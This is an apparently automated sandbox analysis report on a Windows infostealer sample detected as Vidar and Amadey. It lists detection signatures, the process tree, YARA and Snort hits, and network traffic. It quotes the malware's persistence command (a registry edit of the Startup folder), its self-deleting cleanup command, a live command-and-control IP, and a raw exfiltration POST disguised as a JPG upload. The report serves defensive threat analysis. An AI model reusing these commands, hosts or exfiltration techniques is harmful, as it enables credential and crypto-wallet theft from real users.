
Analysis Report wKYTg7Gp6P.exe

Overview

General Information

Sample Name: wKYTg7Gp6P.exe
Analysis ID: 399582
MD5: c4c7d74ca7c0fc1511a82b040a274549
SHA1: b0b1f42d887a07d4bfae6b1e63900bad822b0908
SHA256: 84343112791c187d10af9cea8fac68cf4fc03d72352f1fe2def0bf72f9a9afc7
Tags: ArkeiStealer, exe

Detection

Amadey, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey bot
Yara detected Amadeys stealer DLL
Yara detected Vidar stealer
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates files in alternative data streams (ADS)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Posts data to a JPG file (protocol mismatch)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • wKYTg7Gp6P.exe (PID: 6924 cmdline: 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' MD5: C4C7D74CA7C0FC1511A82B040A274549)
    • M7WCJ84VE5TXJ0R4.exe (PID: 6780 cmdline: 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
      • blfte.exe (PID: 5756 cmdline: 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
        • cmd.exe (PID: 6796 cmdline: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6828 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • rundll32.exe (PID: 6248 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 1380 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • cmd.exe (PID: 5732 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6068 cmdline: taskkill /im wKYTg7Gp6P.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • timeout.exe (PID: 5724 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Vidar


Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
dump.pcap | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\ProgramData\1a9f26b569d5df\cred.dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: wKYTg7Gp6P.exe PID: 6924 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.wKYTg7Gp6P.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.3.wKYTg7Gp6P.exe.2250000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.3.wKYTg7Gp6P.exe.2250000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.wKYTg7Gp6P.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.wKYTg7Gp6P.exe.2180e50.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\ProgramData\1a9f26b569d5df\cred.dll | Avira: detection malicious, Label: HEUR/AGEN.1137247
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll | Avira: detection malicious, Label: HEUR/AGEN.1137247
Source: C:\ProgramData\1a9f26b569d5df\scr.dll | Avira: detection malicious, Label: HEUR/AGEN.1136939
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dll | Avira: detection malicious, Label: HEUR/AGEN.1136939
Found malware configuration
Source: information.txt.0.dr.binstr | Malware Configuration Extractor: Vidar
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\1a9f26b569d5df\cred.dll | ReversingLabs: Detection: 82%
Source: C:\ProgramData\1a9f26b569d5df\scr.dll | ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: wKYTg7Gp6P.exe | Virustotal: Detection: 48%
Source: wKYTg7Gp6P.exe | ReversingLabs: Detection: 58%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exe | Joe Sandbox ML: detected
Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: wKYTg7Gp6P.exe | Joe Sandbox ML: detected
Source: 0.3.wKYTg7Gp6P.exe.2250000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.wKYTg7Gp6P.exe.2180e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_0040B708 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,0_2_0040B708

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Unpacked PE file: 0.2.wKYTg7Gp6P.exe.400000.0.unpack
Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe | Unpacked PE file: 5.2.M7WCJ84VE5TXJ0R4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe | Unpacked PE file: 10.2.blfte.exe.400000.0.unpack
Source: wKYTg7Gp6P.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.17.63.50:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: M7WCJ84VE5TXJ0R4.exe, blfte.exe
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.0.dr
Source: Binary string: UC:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdbpdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.0.dr
Source: Binary string: C:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.0.dr
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_0040657E __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,0_2_0040657E
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_00404905 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,0_2_00404905
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_0045F3B6 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,0_2_0045F3B6
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_00405437 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_00405437
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_0040F7AE _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_0040F7AE
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_0040F998 __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,0_2_0040F998
Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe | Code function: 5_2_00419F82 FindFirstFileExW,5_2_00419F82
Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe | Code function: 5_2_0211A1D2 FindFirstFileExW,5_2_0211A1D2
Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe | Code function: 10_2_00419F82 FindFirstFileExW,10_2_00419F82
Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe | Code function: 10_2_0223A1D2 FindFirstFileExW,10_2_0223A1D2
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_00406917 _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,0_2_00406917
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

                              Networking:

                              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                              Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.4:49744 -> 89.184.92.210:80
                              Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49750 -> 176.111.174.114:80
                              Source: Traffic | Snort IDS: 100000118 COMMUNITY WEB-CLIENT Internet Explorer URLMON.DLL Content-Type Overflow Attempt 176.111.174.114:80 -> 192.168.2.4:49782
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50061 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50062 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50063 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50065 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50066 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50067 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50069 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50070 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50071 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50072 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50074 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50075 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50076 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50078 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50079 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50080 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50082 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50083 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50084 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50085 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50087 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50088 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50090 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50091 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50092 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50093 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50095 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50096 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50097 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50098 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50100 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50101 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50103 -> 176.111.174.114:80
                              Posts data to a JPG file (protocol mismatch)
                              Source: unknown | HTTP traffic detected: POST //Hnq8vS/index.php?scr=up HTTP/1.1 | Host: 176.111.174.114 | User-Agent: Uploador | Content-Type: multipart/form-data; boundary=152138533219.jpg | Connection: Keep-Alive | Content-Length: 227184 | Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
